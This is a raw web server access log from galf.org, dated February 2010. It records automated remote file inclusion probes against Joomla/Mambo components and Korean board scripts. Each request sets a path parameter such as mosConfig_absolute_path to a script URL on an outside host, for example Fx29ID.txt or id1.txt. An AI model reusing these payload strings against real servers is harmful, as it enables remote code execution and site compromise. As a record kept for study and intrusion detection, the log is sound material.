75.126.213.58 - - [01/Feb/2010:02:07:11 -0800] "GET /logs/access_091026.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:07:11 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:07:15 -0800] "GET /logs/access_090914.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:02:07:16 -0800] "GET /logs/access_090720.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:02:07:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:02:07:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:02:07:19 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:02:07:21 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:02:07:21 -0800] "GET /logs/access_090720.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:08:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:08:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:08:15 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:08:16 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:08:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:08:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:43 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:43 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:48 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:48 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:53 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:53 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:57 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:08:57 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:09:06 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:09:07 -0800] "GET /logs///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:09:07 -0800] "GET /logs/access_091102.log///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:24 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:24 -0800] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:35 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:35 -0800] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:36 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:36 -0800] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:43 -0800] "GET /logs/access_091116.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:49 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:49 -0800] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:09:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:10:01 -0800] "GET /logs/access_091116.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:10:02 -0800] "GET /logs/access_091116.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:10:09 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:10:11 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:10:11 -0800] "GET /logs/access_091026.log///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:10:11 -0800] "GET /logs///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:10:11 -0800] "GET /logs/access_091116.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:10:13 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:02:10:14 -0800] "GET /logs/access_090914.log///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:10:23 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:10:23 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:02:10:32 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:02:10:32 -0800] "GET /logs/access_091102.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:02:10:32 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:02:10:32 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:02:10:32 -0800] "GET /logs/access_091102.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.28.184.15 - - [01/Feb/2010:02:10:32 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:02:11:20 -0800] "GET /logs/access.log///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:02:11:20 -0800] "GET //?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:02:11:20 -0800] "GET /logs///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:02:11:26 -0800] "GET /logs/access_090727.log///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:02:11:38 -0800] "GET /logs/access.log///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:02:11:38 -0800] "GET //?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:02:11:38 -0800] "GET /logs///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:02:11:44 -0800] "GET /logs/access_090727.log///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:02:14:28 -0800] "GET /?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
219.240.36.36 - - [01/Feb/2010:02:14:28 -0800] "GET /logs/?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
219.240.36.36 - - [01/Feb/2010:02:14:33 -0800] "GET /logs/access.log/?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.203.198 - - [01/Feb/2010:02:14:43 -0800] "GET /logs/index.php?INCLUDE_FOLDER=http://b2751661.justfree.com/lo.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
85.17.203.198 - - [01/Feb/2010:02:14:43 -0800] "GET /index.php?INCLUDE_FOLDER=http://b2751661.justfree.com/lo.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:14:49 -0800] "GET /logs/access_091102.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:14:49 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:14:49 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:15:49 -0800] "GET /logs/access_091026.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:15:49 -0800] "GET /logs/access_090914.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:16:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:16:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:17:17 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:17:18 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:17:27 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.251.189.204 - - [01/Feb/2010:02:17:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.251.189.204 - - [01/Feb/2010:02:17:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.251.189.204 - - [01/Feb/2010:02:17:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:17:56 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:17:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:18:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.251.189.204 - - [01/Feb/2010:02:18:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.251.189.204 - - [01/Feb/2010:02:18:10 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.251.189.204 - - [01/Feb/2010:02:18:41 -0800] "GET /logs/access_091221.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:18:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:18:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:21:06 -0800] "GET /index0.php?show=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:21:06 -0800] "GET /logs/index0.php?show=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:21:06 -0800] "GET /logs/access_091102.log/index0.php?show=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:21:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:21:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:02:22:17 -0800] "GET /delete_all.php?board_skin_path=http://www.wibs.co.kr/board/data/member/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:02:22:17 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.wibs.co.kr/board/data/member/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:02:22:17 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.wibs.co.kr/board/data/member/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:22:27 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:22:27 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
219.240.39.222 - - [01/Feb/2010:02:22:53 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
